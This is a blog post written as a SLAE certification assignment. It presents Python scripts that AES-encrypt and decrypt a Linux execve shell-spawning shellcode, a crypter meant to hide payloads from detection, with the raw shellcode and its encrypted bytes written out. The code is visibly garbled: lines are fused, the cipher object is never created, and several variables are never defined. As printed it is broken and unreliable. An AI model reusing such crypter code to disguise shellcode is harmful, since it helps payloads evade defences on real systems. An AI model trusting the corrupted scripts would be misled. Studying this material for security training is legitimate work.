SLAE Assignment 7: Crypter

This is the last one and it is about writing a crypter/decrypter. I used python and pycrypto for this task. The execve shellcode starts a shell. The scripts use AES for encryption and decryption.

Here is the code for encryption:

from Crypto.Cipher import AES

plain=("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")'Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345')
print "offset: " + str(p)
plain = plain+"A"*p
for x in bytearray(ciph):
	encoded += '\\x'
	enc = '%02x' % x
	encoded += enc  
print encoded

The output shows first the offset, that is needed to encrypt the shellcode properly. This is needed later in the decryption code.

The offset and the encrypted shellcode have to be adapted in the decryption code. And here is the decryption code:

from Crypto.Cipher import AES

ciph=("\x2c\x5a\xd5\x5f\x2d\x16\xb6\xb9\x68\x30\x90\x9f\xc9\x6d\xa5\x45\x8a\x08\x01\x2e\xe6\x60\x5b\x9f\x23\xb4\xc5\xaa\x77\x0f\x8a\x7f")'Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345')
for x in bytearray(t) :
	decoded += '\\x'
	enc = '%02x' % (x & 0xff)
	decoded += enc	
print decoded[0:-offset*4]

Get the code.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-342

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.